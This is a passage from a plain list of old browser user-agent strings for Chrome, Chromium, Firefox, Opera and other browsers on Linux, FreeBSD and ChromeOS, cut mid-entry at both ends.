Gecko) Chrome/11.0.696.14 Safari/534.24 -Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.702.0 Chrome/12.0.702.0 Safari/534.24 -Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30 -Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Slackware/Chrome/12.0.742.100 Safari/534.30 -Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.35 (KHTML, like Gecko) Ubuntu/10.10 Chromium/13.0.764.0 Chrome/13.0.764.0 Safari/534.35 -Mozilla/5.0 (X11; Linux i686; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.23 -Mozilla/5.0 (X11; Linux i686; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51 -Mozilla/5.0 (X11; Linux i686; rv:2.0b3pre) Gecko/20100731 Firefox/4.0b3pre -Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.3 Safari/534.24 -Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.34 Safari/534.24 -Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.04 Chromium/11.0.696.0 
Chrome/11.0.696.0 Safari/534.24 -Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24 -Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.36 (KHTML, like Gecko) Chrome/13.0.766.0 Safari/534.36 -Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1 -Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62 -Mozilla/5.0 (X11; Linux x86_64; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.60 -Mozilla/5.0 (X11; Linux x86_64; rv:2.0b4) Gecko/20100818 Firefox/4.0b4 -Mozilla/5.0 (X11; U; CrOS i686 0.9.128; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.339 -Mozilla/5.0 (X11; U; CrOS i686 0.9.128; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.339 Safari/534.10 -Mozilla/5.0 (X11; U; CrOS i686 0.9.128; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.341 Safari/534.10 -Mozilla/5.0 (X11; U; CrOS i686 0.9.128; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.343 Safari/534.10 -Mozilla/5.0 (X11; U; CrOS i686 0.9.130; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.344 Safari/534.10 -Mozilla/5.0 (X11; U; DragonFly i386; de; rv:1.9.1) Gecko/20090720 Firefox/3.5.1 -Mozilla/5.0 (X11; U; DragonFly i386; de; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 -Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8 -Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 -Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 -Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4 -Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9.0.10) Gecko/20090624 Firefox/3.5 -Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9.1) Gecko/20090703 Firefox/3.5 -Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9.2.9) Gecko/20100913 Firefox/3.6.9 -Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9a2) Gecko/20080530 Firefox/3.0a2 -Mozilla/5.0 (X11; U; FreeBSD i386; ja-JP; rv:1.9.1.8) Gecko/20100305 Firefox/3.5.8 -Mozilla/5.0 (X11; U; FreeBSD i386; ru-RU; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3 -Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 -Mozilla/5.0 (X11; U; Linux armv7l; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 -Mozilla/5.0 (X11; U; Linux i586; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1) Gecko/20090624 Firefox/3.5 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.175.0 Safari/530.7 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.196.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198.1 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.2 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) 
AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/534.12 (KHTML, like Gecko) Chrome/9.0.576.0 Safari/534.12 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.634.0 Safari/534.16 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9b2) Gecko/2007121016 Firefox/3.0b2 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); fr; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 -Mozilla/5.0 (X11; U; Linux i686; ca; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6 -Mozilla/5.0 (X11; U; Linux i686; ca; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13 -Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929 -Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.9.0.16) Gecko/2009121601 Ubuntu/9.04 (jaunty) Firefox/3.0.16 -Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.9.1.6) Gecko/20100107 Fedora/3.5.6-1.fc12 Firefox/3.5.6 -Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13 -Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.9.2.8) Gecko/20100725 Gentoo Firefox/3.6.8 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.10) Gecko/2009042523 Ubuntu/9.04 (jaunty) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.11) Gecko/2009062218 Gentoo Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.12) Gecko/2009070811 Ubuntu/9.04 (jaunty) Firefox/3.0.12 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.12) Gecko/2009070812 Ubuntu/8.04 (hardy) Firefox/3.0.12 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.14) Gecko/2009082505 Red Hat/3.0.14-1.el5_4 Firefox/3.0.14 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.18) Gecko/2010020400 SUSE/3.0.18-0.1.1 Firefox/3.0.18 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.18) Gecko/2010021501 Firefox/3.0.18 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.9) Gecko/2009041500 SUSE/3.0.9-2.2 Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.04 (hardy) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.10 (intrepid) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1) Gecko/20090624 Firefox/3.5 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1) Gecko/20090624 Ubuntu/8.04 (hardy) Firefox/3.5 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.1) Gecko/20090714 SUSE/3.5.1-1.1 Firefox/3.5.1 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.1) Gecko/20090722 Gentoo Firefox/3.5.1 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.6) Gecko/20091201 SUSE/3.5.6-1.1.1 Firefox/3.5.6 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6 GTB7.0 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 
(karmic) Firefox/3.5.8 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.10) Gecko/20100914 SUSE/3.6.10-0.3.1 Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.10) Gecko/20100915 Ubuntu/9.10 (karmic) Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.12) Gecko/20101027 Fedora/3.6.12-1.fc13 Firefox/3.6.12 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008041514 Firefox/3.0b5 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5 -Mozilla/5.0 (X11; U; Linux i686; en-CA; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.10) Gecko/2009042513 Ubuntu/8.04 (hardy) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.10) Gecko/2009042523 Ubuntu/8.10 (intrepid) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 GTB5 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.11) Gecko/2009060309 Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.13) Gecko/2009080316 Ubuntu/8.04 (hardy) Firefox/3.0.13 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.18) Gecko/2010021501 Ubuntu/9.04 (jaunty) Firefox/3.0.18 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.19) Gecko/2010040118 Ubuntu/8.10 (intrepid) Firefox/3.0.19 GTB7.1 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.1.15) Gecko/20101027 Fedora/3.5.15-1.fc12 Firefox/3.5.15 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6 GTB6 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.2.11) Gecko/20101013 Ubuntu/10.10 (maverick) Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12 GTB7.1 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9b5) Gecko/2008041514 Firefox/3.0b5 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/531.4 (KHTML, like Gecko) Chrome/3.0.194.0 Safari/531.4 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.1 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.196.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197.11 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198.1 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.2 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux 
i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.2 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.204.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.205.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.1 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.209.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.212.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.212.0 Safari/532.1 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.0 Safari/532.1 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.1 Safari/532.1 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.0 Safari/532.2 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.2 Safari/532.2 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.3 Safari/532.2 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.4 Safari/532.2 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.5 Safari/532.2 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.6 Safari/532.2 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.8 Safari/532.2 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.1 Safari/532.2 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.2 Safari/532.2 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.358.0 Safari/533.3 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.366.2 Safari/533.4 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.416.0 Safari/534.1 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.1 SUSE/6.0.428.0 (KHTML, like Gecko) Chrome/6.0.428.0 Safari/534.1 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.551.0 Safari/534.10 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.12 (KHTML, like Gecko) Chrome/9.0.579.0 Safari/534.12 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.44 Safari/534.13 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.13 
(KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/9.10 Chromium/9.0.592.0 Chrome/9.0.592.0 Safari/534.13 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.612.1 Safari/534.15 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.04 Chromium/10.0.612.3 Chrome/10.0.612.3 Safari/534.15 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.611.0 Chrome/10.0.611.0 Safari/534.15 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.0 Chrome/10.0.648.0 Safari/534.16 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.133 Chrome/10.0.648.133 Safari/534.16 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/6.0.453.1 Safari/534.2 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.457.0 Safari/534.3 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.0 Safari/534.3 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.460.0 Safari/534.3 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.462.0 Safari/534.3 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.24 Safari/534.7 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060501 Epiphany/2.14 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.5) Gecko/20060626 (Debian-1.8.0.5-3) Epiphany/2.14 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060808 Fedora/1.5.0.6-2.fc5 Firefox/1.5.0.6 pango-text -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060910 SeaMonkey/1.0.5 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060928 (Debian-1.8.0.7-1) Epiphany/2.14 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20061022 Iceweasel/1.5.0.7-g2 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20061031 Firefox/1.5.0.7 Flock/0.7.7 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.8) Gecko/20061029 SeaMonkey/1.0.6 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20060601 Firefox/2.0 (Ubuntu-edgy) -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Iceweasel/2.0 (Debian-2.0+dfsg-1) -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 Firefox/3.07 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042513 Linux Mint/5 (Elyssa) Firefox/3.0.10 -Mozilla/5.0 (X11; 
U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042523 Linux Mint/6 (Felicia) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042523 Linux Mint/7 (Gloria) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042523 Ubuntu/8.10 (intrepid) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042708 Fedora/3.0.10-1.fc10 Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042812 Gentoo Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060308 Linux Mint/7 (Gloria) Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060310 Linux Mint/6 (Felicia) Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.12) Gecko/2009070610 Firefox/3.0.12 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.12) Gecko/2009070812 Linux Mint/5 (Elyssa) Firefox/3.0.12 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.12) Gecko/2009070818 Firefox/3.0.12 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.12) Gecko/2009070818 Ubuntu/8.10 (intrepid) Firefox/3.0.12 FirePHP/0.3 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14 GTB5 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090905 Fedora/3.0.14-1.fc10 Firefox/3.0.14 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009091010 Firefox/3.0.14 (Debian-3.0.14-1) -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/20090916 Ubuntu/9.04 (jaunty) Firefox/3.0.14 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.17) Gecko/2010010604 Ubuntu/9.04 (jaunty) Firefox/3.0.17 FirePHP/0.4 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.19) Gecko/2010091807 Firefox/3.0.6 (Debian-3.0.6-3) -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1pre) Gecko/2008062222 Firefox/3.0.1pre (Swiftfox) -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008091816 Red Hat/3.0.2-3.el5 Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092000 Ubuntu/8.04 (hardy) Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092313 Ubuntu/1.4.0 (hardy) Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.1 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.1.6 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092318 Fedora/3.0.2-1.fc9 Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092418 CentOS/3.0.2-3.el5.centos Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092809 Gentoo Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; 